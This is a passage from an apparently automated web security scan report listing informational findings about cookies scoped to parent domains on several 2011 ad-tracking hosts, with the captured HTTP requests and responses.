CcxRFFgWTg+M5PlqGM5gPf1Lm71Io6+hyeU7HVRZCt4tN2SeS12q5UQe50Vjv63jtBqtdaO/NA7Xz99YVzQZnOBqU75i/SmMRUxGTtkdQgb1nBAvHbgLdaLAd3SrjWMD1vLQef28zwIxfm1mZNRjpKKidykEE0MnkCjWFzYK36RK5wFrniu8YsuA4ch47I7lFxquMuZGPg3dU4BR7dJw="; udm_0=MLv39C8JZjpr557JwHIRxa5jdQTtJkLnfaG2qg26ZB+wNcQAqiLCTArLHxzvFq5u+Lz+XYjpAOoQ3aXCaMwHVm5cOqJ/d0MlRvTibudFpMUy2dKvpoh2P1mo4DwSF+J5ify/opKpgIxdjs+cX7AMJNbmkATqRCOXSBhPjm35XiawTtcNGQ5TJTiyxPEjXmxThYMLjriRmFvX70E3qN+4fQApOrjujKnAezgCnqbkesD3qtu7yg1H6t/ZCZjuqzbWj5lhOPrgUkFqFOsR5PZJAHdlKcx36ghEs5TWYHJ7Hb5xhWh0E2l5fLBFFP9WPKwWobSjkhpMDi+Kp1AIHk641P8IlIrWomP6IcaKegywe6Owy1lDPNerTKWUsO8YrjXR5olzyy6wLXb6gGqI3omVUL7fPu++A+wGAueB+FZJSxpjEvAreK7XIBTbcuoepx7qL5iMjyaXf9oM3XBiaEFzMNfE0EZUNyI851k2V1WfrejH4WhOwF/zC5Qx1MY4y6GGgNgNnM6HD7V0uycF+LhqJykGY4YcHQb969KlSx75jpXGB/Y/ThqH6llUenum15V8qhTvK/opGkRWSfypvacJFo/PisZ7zXvuoJPtRRvXdS91YPPi/PBgeOZkud3dhFAVymyT7s9aCy71tzZKcb+WKzUOfzdMURGelSLRiHB4XNxnJXS3aqrXBYAsmSu6iffgdJbwMaQekImLZY2TpMIEMIOwOVqRjv2KFv/fX3qS+FWOr2FXXkZjHTVFk5x0LCjJvfrRTvguz3DQbRk3HqOXmqZLJ5j/TXB5bo/MUYug8GlJm7j6TV56dmytyVVvb57ptvBNIgIwn6gR0mAdauLi+ddLwer1QnY/bDEfG507iGGrWyey/94fKyf08GlPmrwfeCUoafeWMYYsJtm/eyN5qIcmcZJeABqdn/9AcMC6mzYb4PGeNu/dr6gt21ABJDq7eJuaFP/RsBfVywN1CTWacnW9m/q5EM9J5MXRoLvnNM9IpaiCzJ8bs79erS+p9F5OJhHllfV8eWdDTtXvA9CnZalLPrGmqw4k9zwZNx0B1clOEPwH5yAlBM4opzlyVEoCF41x7KJj1/ZcwMyTwixt9Mb5iwRRiknHNgfkPDAzchcRdUulOpcg3ATua/3S7CAqTorLhCI6dYrWicgZcOEovUJIdhOG6gYyHef9Ru9lEst4DOzCXkT4zpeT1AyLuQ9Z99q9RBqO9+6yHMAVu5Ordcpplfmw84Ma1JYivS7vq1attqs5EJ7InICNPhTee28EyNp+84w1gvdN25jlYD98oAIdyzgUvUZuGspBPijyfewcj8G0XYzVD2dP1+fV/2/h1ge05Wg9JZ3wAItavV83LWV6mgBqCi29FCEmC1i2znwJzJao4Xeu3lR6It7bRRkLGkctRzQtZZJTMOfSZMCxUakuD0y1LkFwOmg3fVWDcLwE9WJY9rH2QYSk8UOjOZ+l4HB94xgHkRRAb3s2CmWW+sMtGsDM6ZEwDsT+AJZk36vciN7xsCmB7sJEYxcBeN70Q+53oATqe9cGbyzmI5FwovuwZA==

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_hjCW=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_hjCW=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_G9_S="MLsXrrEOpxpv55C28tahZ2a57v4BlC60cICOgIfdHU7gwI+bhP0TqX40neBrVzd04YFJsaw08qSR0PlQ+NWVPKJRSeakCP8BKl+9vpw/cPKd8tMuxPMCPoyxK8+ZjwDWyB3QMrRsmCL0QiC5Kvy/YgnB8KTN7G9dLpnN5M3xqwMP1zgKetVA0BJNDkK20CkficwaFYzIKDZj0KoqzqA1plxgzv/HJ62flvdxhJ1Gxc/BJ/Jkbz0IOuABhmPV05MhqOZD1eXu7sZ4FJ+3eLS0lWDg6HphwKX4gWwd2TZjHpNiYllNlCCt8+VPltAQi3QZQDF7gqUh3eOe1UMhdJxDYoDprFGFL0tgWNie0vdlcMg7d9TDMHvdWXtnwVDETYEb0+0k2lAsYlAa0wyNfiS+1z/gYvdtYy5wMFuUlaQGZ46942BuOwVh0JbAUSGUHgxiWAiJSgm4uSRkM17T7hE3OXEIVJlRaMcX/neeys7HYY7MWGQdhwbw5QP6+mxS8XJ42CRb1O9S2ZH020pDZTLP/2xbvm80WIj4KrD88n9gyyojJIW9vWIMUtdlpg1OxK5zL4VkGL3cLuAJe0xvjKA7bfLIskGGuMlscDOPymQVA2MMlYO1qHEFdDJtI4pCc5RQanuRi6mbbQkxKW3NradsayUtcjFwByl4q0Ns2NHEVcC5yQB/eMs6d4KktD/gnAdAaArbd36hf2ZjHD1oVxkBxCfsc7dDVAyfC/JpkL2UBhmZJZNlL0TCaRdPwg3P/Bh1VheUPetY5IpoWRiVHoAgFMBjn1aTdZw/bhXXNm4VF802HpgDDbwPCQ7mdVOnQAgCyx7Xb8pud4W1ItqEsomU3WoblAx5/ljOZesso+t7L7zFVD+OCiKfqhMy6irDFWju3OFon4GkOvNY9ISl7k3MQRhTrsGzm5ANbPDN4T8I3J/OPR6bDbHY2kiMm+Uk+/uW4K/eiliOo4LICBO/LHnNyWfvUFM7uJnqQhH89Z8RrroFex4a+6I/pnH/Ls01Kep6c/sqiL+d+aVz548eZuZtbEtV6ZQP1TyInHh5N0JPno9ps+A971MFf9IRfGPz5WbAifoCCEK0l4Gwj3YGgQqicfOmPUmQrEnfHaIUdHlruFHFC7FekovubN9IZPuGAqrTeRT8jq5Jp7gEGdlcV49FZLOXxKhVEKIxuSX/PL6xnFfi+3oy84eLsQer1wahgrfrw7xbkQDYVMIqWOiG9Eq2ed0zaeb3vLaINwr/mkGOJKnXg0wl66HlxTleLBBKEhtU3fCNjORp/ElV91Ici4BBDgSU0B7enpTQzS5bf3LCTza/qK+il829xl3RlF12J/NPO5Ja6nB0PGmZypEvg+obtEbuglgXQdPgeflHNvJJstEIZMKKbG73c4rOb993WKfzmQ=="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="pUMV4ylDPxYY7RUCt3RYS68XU2Z7uOqvJR0SNgYO9rFA7CKKB3cozzIdHGjDg2GGihSl38aywkVPVOtaw0GYpb8wbKFEoJ4Hcf23NGtxzjLNjNuJurratNJclKNlnd9kzlWzI5NtujBhqBWWTvdbDCExI1GmrTV9+t5Qks8B2hMYN+2JGnOr7DoSJTvO0PaX3MMt1WYWwvzwFp8R0gsr4WhgVAZORHh0ZLSweLXTo2rLuvFLUXSFwSh2CBWYf5waqWg6FOMqpGQAHBvSeUfM6ov4VVfErYTOmeKF/pbg0OB15tgdJXYh9msh4wx9rx1++0omtJcttyXX8psg0RFshrgzw3uNwQOL5/4Bp/nD9j3X8NOg+dTXBgyQxTjPYKp49l99X/nliGkZ4z6cssziKyg2VmsDy5/Ec2BBARlr4acUHvdGXFLstABR87BjYCnxClCN/BWwe0z7B1mEXTKiAcj9o8mxSkMa1UZ1xZ0rk288ocsm3TMPhrqjaL4bzGrk2gzm5VxKcFW8401eFfLF8rfZKS6Q++UsgSccCDBPlNF1r/N9QYDL1Tq3ssuCoS7HalBy9EaaIsoULjCQDYbmSv0pV1vxJbHeBjvVECwR1N9bcPwGwMvnTyVvp7LetdvcJ2Wbjkwyltj1+JZErC1YDjfccBz1anvzew6CzqHx8L1CRbl1jAMEWa7ge3rsvpF3wKA/hDt65DYYEOfLBkXQHbTea0eTFmoDh6s2ghA/i63LKGRwLgKp3bQqbc49tyzZdDx0fuCQuONaAB/piUUptvOnIaTduWL+WiiFIuocQeWylRtlN7xS+vlsvOw9uBVgLUUTzxVKCNtL35+hiNBpLBXsUwwJOX4bVhSAZkToM/noTwSN8mB3dyb/C8jUcPM8r38/FADFc52dhJySTXbFsyPZts9RhKvtBndBTEO/D/2xdu/StA3LWzJHQIcoitFFG5SQKKoSswDtldD5gfYCVOr8nRXk7GVTF/Q35kHNr+U3zibnEIHpCMPqcVOoT4KwUB4733Px03aQaq5xmE5V4vig8CWJVP5MbSbt7PH/6ZDdk2qlecaHojQv6+pswZMaZEVNiygNS2D8aIvemlup34PcX7GsFsYNDKXYRA/RKMK+zlUjMDHZMbyHToyybX49t1qTWKbr/cz2zNm4cRiTKD0vjdfyHDSVasz/IoblG3aqiP+9nvYuUMQuaai1LmXu7nx968NLV4d/zJIdvOyan/9u/pBbh4x1zd5KFIsGW60anqWRbLMpTmt+dOCfrIOTNQ1Eao5qx1igbggK4cIy9qIiNEXCw7sKCD4f0uKEJPJj7ImwqlvknZIKkRjFcR5I2/q1cFad40CWx/bUtUza29oL0un+jskHMd6kf+Qc7aq4KZNsO5wW84lQa48sKaHVN4NDwMiVwTBF9w5Al/S4uRw3dHJ5oM6ERbSofk3DnPopCFqVreGUP4wvGwVAVP70nK51xkhFjXSBgxzer+/7xvw6GV9UAb6wXT2102bz2CWwPWL5xjufpN5o57ve1w5sefuCGuvUEWDaOSfxLODBuZ3WeHOTSoX+B1g4N5ysz0gGgzh2d09ivuTg9KO1Zt34hNNwjXCpUAhMJQYIj37Vg7I+lEVOTMNf0tOKjsv+eRSSALE9hRu/JjbQu6d5WPQqQ4sHYWL986PKwsqKLeRZNbnN9D3yp/EqKJPmRH+2KZlmuAlRR0SQuS5iY0IKYNTCLw+pU67RpN/haHkbLTVbxtYpIJOIEum3+/1evQx+KKBg1fNpoQRJuiy5sGf47ULyOwbV7R1B1815tz53RzlY3ATXdhc="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Content-Type: application/x-javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Thu, 12 May 2011 11:38:25 GMT
Content-Length: 541

function rsi_img(p,u,c){if(u.indexOf(location.protocol)==0){var i=new Image(2,3);if(c){i.onload=c;}
i.src=u;p[p.length]=i;}}
function rsi_simg(p,s,i){if(i<s.length){rsi_img(p,s[i],function(){rsi_sim
...[SNIP]...

13.20. http://ads1.revenue.net/j previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads1.revenue.net
Path:	/j

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

Train0=.CAB92OjE6MToxMjE2OToyMjcyNDU6MzQ0MDo1ODQzNzUzNzoxOjA6MTMwNTI0NDkxNDoxsAEEMDE3MTQ6LSkEAAcxMzA1MjAxNzE0EQAA; path=/; domain=.revenue.net; expires=Fri, 10 Jun 2022 05:05:41 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /j?site_id=12169&pplacement_id=1&r_num=58437537 HTTP/1.1
Host: ads1.revenue.net
Proxy-Connection: keep-alive
Referer: http://pepperhamilton.com/?epl=7VC_ZCF-qAinEUr8RrN2ElD1UYCHhMIpkrv4HU2ICSZqhp18zI-zQHkE8C0nDiTMgf6MYi8CRELFJtdUQvTEgSRGY6_nrN4UxmreqxnQEBZqbC2uTdEKuiAxNRMZ27auTDPfJeH2pRYyoMlkMtKon5opgpo8kGkayibaQBF1ACAQ3Oe_AADgfwUAAECA2wgAAKo-CvBZUyZZQTE2aFpCgwAAAPA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Train0=.CAB9sOjE6MToxMjE2OToyMjcyNDU6MzQ0MDo3MzQzODkxNDoxOjA6MTMwMzU3NzM4MjoxsAEEMzQxODI6LSkEAIwEmgJ8dnQEIAdOATE3dAVgDAIzNDExNylEAQktOjEzMDM1MzQxODIRAAA=

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:01:54 GMT
Server: Oversee Webserver v1.3.20
Vary: Accept-Encoding
Cache-control: private, no-cache, must-revalidate
Pragma: no-cache
P3P: policyref="/w3c/revenue.xml", CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Connection: close
O_CREATIVE_ID: 227245
Set-Cookie: Train0=.CAB92OjE6MToxMjE2OToyMjcyNDU6MzQ0MDo1ODQzNzUzNzoxOjA6MTMwNTI0NDkxNDoxsAEEMDE3MTQ6LSkEAAcxMzA1MjAxNzE0EQAA; path=/; domain=.revenue.net; expires=Fri, 10 Jun 2022 05:05:41 GMT
Content-Type: text/html
Content-Length: 331

document.write('<SCRIPT TYPE="text/javascript" SRC="http://panther1.cpxinteractive.com/mz/ds.js"></SCRIPT>');

document.write('<script language="JavaScript" src="http://ads1.revenue.net/load/2
...[SNIP]...

13.21. http://ads1.revenue.net/load/227245/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads1.revenue.net
Path:	/load/227245/index.html

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

Train0=.CAB9sOjE6MToxMjE2OToyMjcyNDU6MzQ0MDo1ODQzNzUzNzoxOjA6MTMwNTI0NDU2MjoxsAEEMDEzNjI6LSkEAIwEmgJ8dnQEIAdNATVUDydOATUxKUQBCS06MTMwNTIwMTM2MhEAAA==; path=/; domain=.revenue.net; expires=Fri, 10 Jun 2022 05:05:41 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /load/227245/index.html?O_R_NUM=58437537&O_RANK=1&O_CREATIVE_ID=227245&O_PPLACEMENT_ID=1&O_SITE_ID=12169& HTTP/1.1
Host: ads1.revenue.net
Proxy-Connection: keep-alive
Referer: http://pepperhamilton.com/?epl=7VC_ZCF-qAinEUr8RrN2ElD1UYCHhMIpkrv4HU2ICSZqhp18zI-zQHkE8C0nDiTMgf6MYi8CRELFJtdUQvTEgSRGY6_nrN4UxmreqxnQEBZqbC2uTdEKuiAxNRMZ27auTDPfJeH2pRYyoMlkMtKon5opgpo8kGkayibaQBF1ACAQ3Oe_AADgfwUAAECA2wgAAKo-CvBZUyZZQTE2aFpCgwAAAPA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Train0=.CABx2OjE6MToxMjE2OToyMjcyNDU6MzQ0MDo1ODQzNzUzNzoxOjA6MTMwNTI0NDU1RAWwAQQwMTM1MTotKQQABzEzMDUyMDEzNTERAAA=

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:56:02 GMT
Server: Oversee Webserver v1.3.20
Vary: Accept-Encoding
Cache-control: private, no-cache, must-revalidate
Pragma: no-cache
P3P: policyref="/w3c/revenue.xml", CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Connection: close
O_CREATIVE_ID: 227245
Set-Cookie: Train0=.CAB9sOjE6MToxMjE2OToyMjcyNDU6MzQ0MDo1ODQzNzUzNzoxOjA6MTMwNTI0NDU2MjoxsAEEMDEzNjI6LSkEAIwEmgJ8dnQEIAdNATVUDydOATUxKUQBCS06MTMwNTIwMTM2MhEAAA==; path=/; domain=.revenue.net; expires=Fri, 10 Jun 2022 05:05:41 GMT
Content-Type: text/html
Content-Length: 0

13.22. http://akatracking.esearchvision.com/esi/redirect.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://akatracking.esearchvision.com
Path:	/esi/redirect.html

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ESVUSERID=f20c82c6e40fc343b5bded3feff6e6ee;expires=Fri, 11 May 2012 11:01:11 GMT;path=/;domain=esearchvision.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /esi/redirect.html?esvadt=999999-2475-1260-1&esvq=private%20equity&esvrq=private%20equity&esvcrea=187139093&esvt=128-MSUSe20937&transferparams=0&esvaid=40007&url=http%3a%2f%2fad.doubleclick.net%2fclk%3b233236047%3b62821348%3bd%3fhttps%3a%2f%2fpersonal.vanguard.com%2fus%2ffunds%2fsnapshot%3fFundId%3d0051%26FundIntExt%3dINT%26WT.srch%3d1%3fWT.srch%3d1 HTTP/1.1
Host: akatracking.esearchvision.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache
Content-Length: 153
Content-Type: text/html
Location: http://akatracking.esearchvision.com/esi/redirect2.html?esvstue=1305198071&esvadt=999999-2475-1260-1&esvq=private%20equity&esvrq=private%20equity&esvcrea=187139093&esvt=128-MSUSe20937&transferparams=0&esvaid=40007&url=http%3a%2f%2fad.doubleclick.net%2fclk%3b233236047%3b62821348%3bd%3fhttps%3a%2f%2fpersonal.vanguard.com%2fus%2ffunds%2fsnapshot%3fFundId%3d0051%26FundIntExt%3dINT%26WT.srch%3d1%3fWT.srch%3d1
Set-Cookie: ESVUSERID=f20c82c6e40fc343b5bded3feff6e6ee;expires=Fri, 11 May 2012 11:01:11 GMT;path=/;domain=esearchvision.com
ETag: "c442c4a32adbd04908e9fed8cf5e4aff:1203522432"
P3P: CP="NON DSP COR ADM PSA IVA OUR STP NAV"
Vary: Accept-Encoding
P3P: CP="NON DSP COR ADM PSA IVA OUR STP NAV"
P3P: CP="NON DSP COR ADM PSA IVA OUR STP NAV"
P3P: CP="NON DSP COR ADM PSA IVA OUR STP NAV"
P3P: CP="NON DSP COR ADM PSA IVA OUR STP NAV"
Cache-Control: max-age=77115
Date: Thu, 12 May 2011 11:01:11 GMT
Connection: close

<HTML>
<HEAD>
<TITLE>Error Page</TITLE>
</HEAD>
<BODY>
An error (302 Moved Temporarily) has occured in response to this request.
</BODY>
</HTML>

13.23. http://akatracking.esearchvision.com/esi/redirect2.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://akatracking.esearchvision.com
Path:	/esi/redirect2.html

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ESVA40007=esvcid=S1305198071_UIDf20c82c6e40fc343b5bded3feff6e6ee_ADOMSe_AGI1260_ADI2475_CRE187139093_TID20937_TRMcHJpdmF0ZSUyMGVxdWl0eQ%3d%3d_RAWcHJpdmF0ZSUyMGVxdWl0eQ%3d%3d;expires=Fri, 11 May 2012 11:01:11 GMT;path=/;domain=esearchvision.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /esi/redirect2.html?esvstue=1305198071&esvadt=999999-2475-1260-1&esvq=private%20equity&esvrq=private%20equity&esvcrea=187139093&esvt=128-MSUSe20937&transferparams=0&esvaid=40007&url=http%3a%2f%2fad.doubleclick.net%2fclk%3b233236047%3b62821348%3bd%3fhttps%3a%2f%2fpersonal.vanguard.com%2fus%2ffunds%2fsnapshot%3fFundId%3d0051%26FundIntExt%3dINT%26WT.srch%3d1%3fWT.srch%3d1 HTTP/1.1
Host: akatracking.esearchvision.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ESVUSERID=f20c82c6e40fc343b5bded3feff6e6ee

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache
Content-Length: 153
Content-Type: text/html
Location: http://ad.doubleclick.net/clk;233236047;62821348;d?https://personal.vanguard.com/us/funds/snapshot?FundId=0051&FundIntExt=INT&WT.srch=1?WT.srch=1
Set-Cookie: ESVA40007=esvcid=S1305198071_UIDf20c82c6e40fc343b5bded3feff6e6ee_ADOMSe_AGI1260_ADI2475_CRE187139093_TID20937_TRMcHJpdmF0ZSUyMGVxdWl0eQ%3d%3d_RAWcHJpdmF0ZSUyMGVxdWl0eQ%3d%3d;expires=Fri, 11 May 2012 11:01:11 GMT;path=/;domain=esearchvision.com
Set-Cookie: REFESEVA40007=;expires=Fri, 11 May 2012 11:01:11 GMT;path=/;domain=esearchvision.com
ETag: "c7728f1f5feca396220a5389a6a06c7d:1304367611"
P3P: CP="NON DSP COR ADM PSA IVA OUR STP NAV"
Vary: Accept-Encoding
P3P: CP="NON DSP COR ADM PSA IVA OUR STP NAV"
P3P: CP="NON DSP COR ADM PSA IVA OUR STP NAV"
Cache-Control: max-age=34120
Date: Thu, 12 May 2011 11:01:11 GMT
Connection: close

<HTML>
<HEAD>
<TITLE>Error Page</TITLE>
</HEAD>
<BODY>
An error (302 Moved Temporarily) has occured in response to this request.
</BODY>
</HTML>

13.24. http://altfarm.mediaplex.com/ad/js/15917-119013-26745-9 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://altfarm.mediaplex.com
Path:	/ad/js/15917-119013-26745-9

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

mojo3=15917:26745/13198:5934/13305:22136/17263:25710/17113:25710/16186:22724/15368:22624/16228:16454/10105:1629/14302:16279/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408; expires=Sun, 12-May-2013 4:51:06 GMT; path=/; domain=.mediaplex.com;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ad/js/15917-119013-26745-9?mpt=4107592&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3b05/3/0/%2a/x%3B240687484%3B0-0%3B0%3B22018236%3B4307-300/250%3B41199286/41217073/1%3Bu%3D10428|||||article|frame1|recession|henry-kravis|rjr-nabisco|junk-bonds|padma-lakshmi|||||||||||||||||||||%3B%7Eokv%3D%3Bcomp%3D%3Bs1%3Dmarkets%3Bs2%3D%3Bpos%3Dframe1%3Bctype%3Dfront%3Bptype%3Darticle%3Burl%3Dmarkets_2011_05_03_legendary-deal-maker-ted-forstmann-treated-brain-cancer_%3Bm1%3Drecession%3Bm2%3Dhenry-kravis%3Bm3%3Drjr-nabisco%3Bm4%3Djunk-bonds%3Bm5%3Dpadma-lakshmi%3Brs%3D10428%3Bqc%3DD%3Bqc%3DT%3Bqc%3D3995%3Bqc%3D921%3Bqc%3D922%3Bqc%3D928%3Bqc%3D929%3Bqc%3D3994%3Bsz%3D300x250%2C336x280%3Btile%3D2%3Bu%3D10428|||||article|frame1|recession|henry-kravis|rjr-nabisco|junk-bonds|padma-lakshmi|||||||||||||||||||||%3B%21c%3D%3B%7Eaopt%3D2/1/9e/0%3B%7Esscs%3D%3f HTTP/1.1
Host: altfarm.mediaplex.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; __utmz=183366586.1303926238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.719740200.1303926238.1303926238.1303926238.1; mojo2=17912:1281/16228:26209; mojo3=13198:5934/13305:22136/17263:25710/17113:25710/16186:22724/15368:22624/16228:16454/10105:1629/14302:16279/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Cache-Control: no-store
Pragma: no-cache
Expires: 0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Set-Cookie: mojo3=15917:26745/13198:5934/13305:22136/17263:25710/17113:25710/16186:22724/15368:22624/16228:16454/10105:1629/14302:16279/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408; expires=Sun, 12-May-2013 4:51:06 GMT; path=/; domain=.mediaplex.com;
Location: http://img.mediaplex.com/content/0/15917/119013/OD_Promises_Domestic_300x250.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F15917-119013-26745-9%3Fmpt%3D4107592&mpjs=core.insightexpressai.com%2FadServer%2FadServerESI.aspx%3FbannerID%3D175237%26siteID%3D15917119013267459%26creativeID%3D7164347&mpt=4107592&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3b05/3/0/%2a/x%3B240687484%3B0-0%3B0%3B22018236%3B4307-300/250%3B41199286/41217073/1%3Bu%3D10428|||||article|frame1|recession|henry-kravis|rjr-nabisco|junk-bonds|padma-lakshmi|||||||||||||||||||||%3B%7Eokv%3D%3Bcomp%3D%3Bs1%3Dmarkets%3Bs2%3D%3Bpos%3Dframe1%3Bctype%3Dfront%3Bptype%3Darticle%3Burl%3Dmarkets_2011_05_03_legendary-deal-maker-ted-forstmann-treated-brain-cancer_%3Bm1%3Drecession%3Bm2%3Dhenry-kravis%3Bm3%3Drjr-nabisco%3Bm4%3Djunk-bonds%3Bm5%3Dpadma-lakshmi%3Brs%3D10428%3Bqc%3DD%3Bqc%3DT%3Bqc%3D3995%3Bqc%3D921%3Bqc%3D922%3Bqc%3D928%3Bqc%3D929%3Bqc%3D3994%3Bsz%3D300x250%2C336x280%3Btile%3D2%3Bu%3D10428|||||article|frame1|recession|henry-kravis|rjr-nabisco|junk-bonds|padma-lakshmi|||||||||||||||||||||%3B%21c%3D%3B%7Eaopt%3D2/1/9e/0%3B%7Esscs%3D%3f
Content-Length: 0
Date: Thu, 12 May 2011 11:39:07 GMT

13.25. http://amch.questionmarket.com/adsc/d908257/6/911744/decide.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://amch.questionmarket.com
Path:	/adsc/d908257/6/911744/decide.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

CS1=deleted; expires=Wed, 12 May 2010 11:39:44 GMT; path=/; domain=.questionmarket.com
CS1=725047-17-5_725047-7-2_725047-14-1_725047-12-1_40147218-21-1_41662936-12-1_851211-1-1_41115363-7-1_40774550-15-1_40379521-23-2_40774545-15-1_717103-2-1_500005059184-4-1_892555-6-2_41645540-6-1_41838359-2-1_891856-2-1_725047-4-1_725047-18-3_725047-9-1_865756-1-1_500004862365-3-1_40348193-4-1_42050771-4-1_600001470346-3-1_40506188-17-1_40506183-17-1_40506184-17-1_873601-2-1_912024-2-1_200214693344-2-1_912025-2-4_911744-6-1; expires=Mon, 02 Jul 2012 03:39:45 GMT; path=/; domain=.questionmarket.com
ES=859330-mt!$M-0_851211-g|0'M-0_840009-~d2'M-0_866249-hAB'M-^2_878089-aAB'M-N3_674921-dnE'M-0_884653-YBE'M-0_878529-m!E'M-C_908201-su''M-0_891575-V(''M-0_724925-fwM$M-JXi1_865756-Ihl$M-WaK1_887938-i]y(M-0_845473-pLz(M-0_908355-Tf/(M-0_907755-Pt<(M-0_855789-\l?(M-mn6_872313-xZ{(M-0_909615-*66)M-<E_908257-ON6)M-0; expires=Mon, 02-Jul-2012 03:39:45 GMT; path=/; domain=.questionmarket.com;

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adsc/d908257/6/911744/decide.php?ord=1305200304 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/2011/05/03/private-equity-titans-finds-common-ground/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
